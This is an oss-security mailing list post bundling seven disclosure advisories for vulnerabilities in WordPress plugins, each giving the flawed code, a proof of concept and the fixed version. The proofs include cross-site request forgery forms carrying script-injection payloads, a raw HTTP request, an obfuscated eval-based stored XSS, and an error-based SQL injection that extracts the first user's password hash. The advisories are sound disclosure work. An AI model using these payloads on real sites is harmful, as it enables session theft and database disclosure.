Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 2 Aug 2016 20:49:58 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting seven WordPress (XSS, CSRF, SQLi)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.


------------------------------------------------------------------------
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0021

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the ALO EasyMail Newsletter WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to add/import arbitrary subscribers. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on ALO EasyMail Newsletter [2]
WordPress Plugin version 2.9.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in ALO EasyMail Newsletter version 2.9.3 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
ALO EasyMail Newsletter [2] is a plugin for WordPress that allows to
write and send newsletters, and to gather and manage the subscribers. It
supports internationalization and multilanguage. It was discovered that
the ALO EasyMail Newsletter WordPress Plugin is vulnerable to Cross-Site
Request Forgery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A number of actions within ALO EasyMail Newsletter consist of two steps.
The 'step one' action is protected against Cross-Site Request Forgery by
means of the check_admin_referer() WordPress function.

<?php 
/**
 * Bulk action: Step #1/2
 */
if ( isset($_REQUEST['doaction_step1']) ) {
	check_admin_referer('alo-easymail_subscribers');


However the call to check_admin_referer() has been commented out for all
'step two' actions. Due to this it is possible for an attacker to
perform a Cross-Site Request Forgery attack for all the 'step 2'
actions.

/**
 * Bulk action: Step #2/2
 */
if ( isset($_REQUEST['doaction_step2']) ) {
	//if($wp_version >= '2.6.5')
check_admin_referer('alo-easymail_subscribers');
	
Amongst others, this issue can be used to add/import arbitrary
subscribers. In order to exploit this issue, the attacker has to
lure/force a victim into opening a malicious website/link.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
POST
/wp-admin/edit.php?post_type=newsletter&page=alo-easymail%2Fpages%2Falo-easymail-admin-subscribers.php&doaction_step2=true&action=import
HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <session cookies>
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------17016644981835490787491067954
Content-Length: 645
	
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="uploaded_csv"; filename="foo.csv"
Content-Type: text/plain
	
sumofpwn@...urify.n;Summer of Pwnage;en
	
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="post_type"
	
newsletter
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="action"
	
import_step2
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="doaction_step2"
	
Upload CSV file
-----------------------------17016644981835490787491067954--[h3]References[/h3]
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_alo_easymail_newsletter_wordpress_plugin.html
[2] https://wordpress.org/plugins/alo-easymail/
[3] https://downloads.wordpress.org/plugin/alo-easymail.2.9.3.zip
------------------------------------------------------------------------
Cross-Site Scripting in Contact Bank WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Contact Bank
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0023

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Contact Bank - Contact Forms
Builder [2] WordPress Plugin version 2.1.21.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Contact Bank version 2.1.23 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Contact Bank [2] WordPress Plugin is a form builder plugin that lets
you create contact forms in seconds with ease. A Cross-Site Scripting
vulnerability was found in the Contact Bank WordPress Plugin. This issue
allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a malicious
website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file views/header.php and is caused by the lack
of output encoding on the page request parameter. The vulnerable code is
listed below.

<script>
jQuery(document).ready(function()
{
	jQuery(".nav-tab-wrapper > a#<?php echo
$_REQUEST["page"];?>").addClass("nav-tab-active");
});
</script>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=contact_dashboard"
method="POST">
			<input type="hidden" name="page"
value="</script><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_contact_bank_wordpress_plugin.html
[2] https://wordpress.org/plugins/contact-bank/
[3] https://downloads.wordpress.org/plugin/contact-bank.zip
------------------------------------------------------------------------
Cross-Site Scripting in Uji Countdown WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Uji Countdown
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0029

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Uji Countdown [2] WordPress Plugin
version 2.0.6.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Uji Countdown version 2.0.7 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Uji Countdown [2] WordPress Plugin allows users to display a
countdown on their post or page. A Cross-Site Scripting vulnerability
was found in the Uji Countdown WordPress Plugin. This issue allows an
attacker to perform a wide variety of actions, such as stealing
Administrators' session tokens, or performing arbitrary actions on their
behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file /classes/class-uji-countdown-admin.php and
is caused by the lack of output encoding in the ujic_tabs_values()
function.

private function ujic_tabs_values() {
	global $wpdb;
	$ujictab = '';
	$table_name = $wpdb->prefix . "uji_counter";
	$ujic_datas = $wpdb->get_results( "SELECT * FROM $table_name ORDER BY
`time` DESC" );
	if ( !empty( $ujic_datas ) ) {
		foreach ( $ujic_datas as $ujic ) {
			$ujic_style = !empty( $ujic->style ) ? $ujic->style : 'classic';
			$ujic_ico = '<span id="ujic-style-' . $ujic_style . '"
class="ujic-types">' . $ujic_style . '</span>';
			$ujictab .='<tr>
							<td>' . $ujic->time . '</td>
							<td>' . $ujic->title . '</td>
							<td>' . $ujic_ico . '</td>
							<td>
						<a href="?page=uji-countdown&tab=tab_ujic_new&edit=' . $ujic->id .
'"><i class="dashicons dashicons-welcome-write-blog"></i>Edit</a> | <a
href="options-general.php?page=uji-countdown&del=' . $ujic->id . '"><i
class="dashicons dashicons-trash"></i> Delete</a>
					</td>
					</tr>';
		}
	}
	
	return $ujictab;
}

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=uji-countdown&tab=tab_ujic_new&style=classic&save=true"
method="POST">
			<input type="hidden" name="ujic&#95;style" value="classic" />
			<input type="hidden" name="ujic&#95;name"
value="&quot;><script>alert(1);</script>" />
			<input type="hidden" name="ujic&#95;goof" value="ABeeZee" />
			<input type="hidden" name="ujic&#95;pos" value="center" />
			<input type="hidden" name="ujic&#95;d" value="true" />
			<input type="hidden" name="ujic&#95;h" value="true" />
			<input type="hidden" name="ujic&#95;m" value="true" />
			<input type="hidden" name="ujic&#95;s" value="true" />
			<input type="hidden" name="ujic&#95;txt" value="true" />
			<input type="hidden" name="ujic&#95;size" value="32" />
			<input type="hidden" name="ujic&#95;col&#95;dw" value="&#35;a61ba6"
/>
			<input type="hidden" name="ujic&#95;col&#95;up" value="&#35;c368c3"
/>
			<input type="hidden" name="ujic&#95;col&#95;txt" value="&#35;ffffff"
/>
			<input type="hidden" name="ujic&#95;col&#95;sw" value="&#35;000000"
/>
			<input type="hidden" name="ujic&#95;col&#95;lab" value="&#35;000000"
/>
			<input type="hidden" name="ujic&#95;lab&#95;sz" value="13" />
			<input type="hidden" name="ujic&#95;subscrFrmWidth" value="100" />
			<input type="hidden" name="ujic&#95;subscrFrmAboveText"
value="Join&#32;Our&#32;Newsletter" />
			<input type="hidden" name="ujic&#95;subscrFrmInputText"
value="Enter&#32;your&#32;email&#32;here" />
			<input type="hidden" name="ujic&#95;subscrFrmSubmitText"
value="Subscribe" />
			<input type="hidden" name="ujic&#95;subscrFrmSubmitColor"
value="&#35;ab02b2" />
			<input type="hidden" name="ujic&#95;subscrFrmThanksMessage"
value="Thanks&#32;for&#32;subscribing" />
			<input type="hidden" name="ujic&#95;subscrFrmErrorMessage"
value="Invalid&#32;email&#32;address" />
			<input type="hidden" name="submit&#95;ujic" value="Save&#32;Style" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_uji_countdown_wordpress_plugin.html
[2] https://wordpress.org/plugins/uji-countdown/
[3] https://downloads.wordpress.org/plugin/uji-countdown.zip
------------------------------------------------------------------------
Cross-Site Scripting in WangGuard WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WangGuard
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0030

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WangGuard [2] WordPress Plugin
version 1.7.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WangGuard version 1.7.2 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WangGuard [2] WordPress Plugin protects against sploggers and spam
users registration. A Cross-Site Scripting vulnerability was found in
the WangGuard WordPress Plugin. This issue allows an attacker to perform
a wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf.


------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file wangguard-admin.php and is caused by the
lack of output encoding on the security questions & answers. It should
be noted that this functionality is also vulnerable to Cross-Site
Request Forgery.

jQuery("#wangguardnewquestionbutton").click(function() {
	jQuery("#wangguardnewquestionerror").hide();
	var wgq = jQuery("#wangguardnewquestion").val();
	var wga = jQuery("#wangguardnewquestionanswer").val();
	if ((wgq=='') || (wga=='')) {
		jQuery("#wangguardnewquestionerror").slideDown();
		return;
	}
	data = {
		action	: 'wangguard_ajax_questionadd',
		q		: wgq,
		a		: wga
	};
	jQuery.post(ajaxurl, data, function(response) {
		if (response!='0') {
			jQuery("#wangguard-question-noquestion").remove();
			var newquest = '<div class="wangguard-question"
id="wangguard-question-'+response+'">';
			newquest += '<?php  echo addslashes(__("Question", 'wangguard')) ?>:
<strong>'+wgq+'</strong><br/>';
			newquest += '<?php  echo addslashes(__("Answer", 'wangguard')) ?>:
<strong>'+wga+'</strong><br/>';
			newquest += '<a href="javascript:void(0)" rel="'+response+'"
class="wangguard-delete-question"><?php  echo addslashes(__('delete
question', 'wangguard')) ?></a></div>';
			jQuery("#wangguard-new-question-container").append(newquest);
			jQuery("#wangguardnewquestion").val("");
			jQuery("#wangguardnewquestionanswer").val("");
		}
		else if (response=='0') {
			jQuery("#wangguardnewquestionerror").slideDown();
		}
	});
});

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action"
value="wangguard&#95;ajax&#95;questionadd" />
			<input type="hidden" name="q" value="xss&#63;" />
			<input type="hidden" name="a"
value="&quot;><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>[h3]References[/h3]
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_wangguard_wordpress_plugin.html
[2] https://wordpress.org/plugins/wangguard/
[3] https://downloads.wordpress.org/plugin/wangguard.1.7.2.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Booking Calendar WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Booking Calendar
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on Booking Calendar [3] WordPress
Plugin version 6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Booking Calendar version 6.2.1 [4].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Booking Calendar [3] WordPress Plugin is a booking system for online
reservation and availability checking service for your site. A Reflected
Cross-Site Scripting vulnerability exists in the Booking Calendar
WordPress plugin. This vulnerability allows an attacker to perform any
action with the privileges of the target user. The affected code is not
protected with an anti-Cross-Site Request Forgery token. Consequently,
it can be exploited by luring the target user into clicking a specially
crafted link or visiting a malicious website (or advertisement).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the wpdev_bk_settings_form_labels() function
from  booking/lib/wpdev-settings-general.php (line 1492).

All input field on the Booking > Settings > Fields page are vulnerable
to Cross-Site Scripting, eg
http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=form.

Also all the form from the Booking > Settings > Import tab are
vulnerable to Cross-Site Scripting, however a valid anti-CSRF token in
this tab is required, eg
http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=sync.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=form"
method="POST">
			<input type="hidden" name="booking&#95;form&#95;field&#95;label1"
value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;"
/>
			<input type="hidden" name="booking&#95;form&#95;field&#95;label2"
value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;"
/>
			<input type="hidden" name="booking&#95;form&#95;field&#95;label3"
value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;"
/>
			<input type="hidden" name="booking&#95;form&#95;field&#95;label6"
value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;"
/>
			<input type="hidden" name="booking&#95;form&#95;field&#95;values6"
value="" />
			<input type="hidden" name="booking&#95;form&#95;field&#95;label4"
value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;"
/>
			<input type="hidden" name="booking&#95;form&#95;field&#95;active4"
value="On" />
			<input type="hidden" name="booking&#95;form&#95;field&#95;label5"
value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;"
/>
			<input type="hidden" name="Submit" value="Save&#32;Changes" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_booking_calendar_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/booking/
[4] https://downloads.wordpress.org/plugin/booking.zip
------------------------------------------------------------------------
SQL injection vulnerability in Booking Calendar WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
An SQL injection vulnerability exists in the Booking Calendar WordPress
plugin. This vulnerability allows an attacker to view data from the
database. The affected parameter is not properly sanitized or protected
with an anti-Cross-Site Request Forgery token. Consequently, it can
(also be exploited by luring the target user into clicking a specially
crafted link or visiting a malicious website (or advertisement).

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on Booking Calendar [3] WordPress
Plugin version 6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Booking Calendar version 6.2.1 [4].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Booking Calendar [3] WordPress Plugin is a booking system for online
reservation and availability checking service for your site. An SQL
injection vulnerability exists in the Booking Calendar WordPress plugin.
This vulnerability allows an attacker to view data from  the database.
The affected parameter is not properly sanitized or protected with an
anti-Cross-Site Request Forgery token. Consequently, it can (also be
exploited by luring the target user into clicking a specially crafted
link or visiting a malicious website (or advertisement).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This was discovered by the using the filter by Booking ID field. Because
a WordPress user with the 'Editor' role can also use the Booking plugin,
Editors can also access the vulnerable parameter. This allows these
users to view all data from the database. The vulnerability exists in
the wpdev_get_args_from_request_in_bk_listing() function from 
booking/lib/wpdev-bk-lib.php (line 709).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept will show the hashed password from the
first user.

<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking&wh_approved&wh_is_new=1&wh_booking_date=3&view_mode=vm_listing"
method="POST">
			<input type="hidden" name="wh&#95;booking&#95;id" value="3 AND
(SELECT 5283 FROM(SELECT COUNT(*),CONCAT(0x7176626271,(SELECT
MID((IFNULL(CAST(user_pass AS CHAR),0x20)),1,54) FROM wordpress.wp_users
ORDER BY ID LIMIT 0,1),0x717a787a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/sql_injection_vulnerability_in_booking_calendar_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/booking/
[4] https://downloads.wordpress.org/plugin/booking.zip
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in WP Live Chat Support
WordPress Plugin
------------------------------------------------------------------------
Dennis Kerdijk <dennis.at.securelabs.nl> & Erwin Kievith
<erwin.at.securelabs.nl>, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the WP Live
Chat Support WordPress Plugin. This issue can be exploited by an
unauthenticated user. It allows an attacker to perform a wide variety of
actions, such as stealing users' session tokens, or performing arbitrary
actions on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0010

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Live Chat Support [2] WordPress
Plugin version 6.2.03.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WP Live Chat Support version 6.2.04 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WP Live Chat Support [2] allows chatting with visitors of a WordPress
site. A persistent Cross-Site Scripting vulnerability has been
discovered in the WP Live Chat Support allowing an attacker to execute
actions on behalf of a logged on WordPress user. A stored Cross-Site
Scripting vulnerability was found in the WP Live Chat Support WordPress
Plugin. This issue can be exploited by an unauthenticated user. It
allows an attacker to perform a wide variety of actions, such as
stealing users' session tokens, or performing arbitrary actions on their
behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the file wp-live-chat-support/functions.php
(line 1233), which is called in the file
wp-live-chat-support/wp-live-chat-support.php (line 602):

wp-live-chat-support/wp-live-chat-support.php:

600         if ($_POST['action'] == "wplc_user_send_offline_message") {
601             if(function_exists('wplc_send_offline_msg')){
wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'],
$_POST['cid']); }
602             if(function_exists('wplc_store_offline_message')){
wplc_store_offline_message($_POST['name'], $_POST['email'],
$_POST['msg']); }
603             do_action("wplc_hook_offline_message",array(
604               "cid"=>$_POST['cid'],
605               "name"=>$_POST['name'],
606               "email"=>$_POST['email'],
607               "url"=>get_site_url(),
608               "msg"=>$_POST['msg']
609               )
610             );
611         }

wp-live-chat-support/functions.php:

1206 function wplc_store_offline_message($name, $email, $message){
1207     global $wpdb;
1208     global $wplc_tblname_offline_msgs;
1209 
1210     $wplc_settings = get_option('WPLC_SETTINGS');
1211 
1212     if(isset($wplc_settings['wplc_record_ip_address']) &&
$wplc_settings['wplc_record_ip_address'] == 1){
1213         if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) &&
$_SERVER['HTTP_X_FORWARDED_FOR'] != '') {
1214             $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR'];
1215         } else {
1216             $ip_address = $_SERVER['REMOTE_ADDR'];
1217         }
1218         $offline_ip_address = $ip_address;
1219     } else {
1220         $offline_ip_address = "";
1221     }
1222 
1223 
1224     $ins_array = array(
1225         'timestamp' => current_time('mysql'),
1226         'name' => $name,
1227         'email' => $email,
1228         'message' => $message,
1229         'ip' => $offline_ip_address,
1230         'user_agent' => $_SERVER['HTTP_USER_AGENT']
1231     );
1232 
1233     $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs,
$ins_array );
1234     return;
1235 }

The vulnerability can be exploited using a specially crafted POST
request. The victim needs view the WP Live Chat Offline Messages page to
trigger the Cross-Site Scripting payload. It should be noted taht the
offline message functionality is available even if there is a logged on
chat user present.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 361
Connection: close
	
action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97,
108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109,
101, 33, 34, 41,
59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108,
101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33,
34, 41, 59));</script>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_wp_live_chat_support_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-live-chat-support/
[3] https://downloads.wordpress.org/plugin/wp-live-chat-support.zip

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ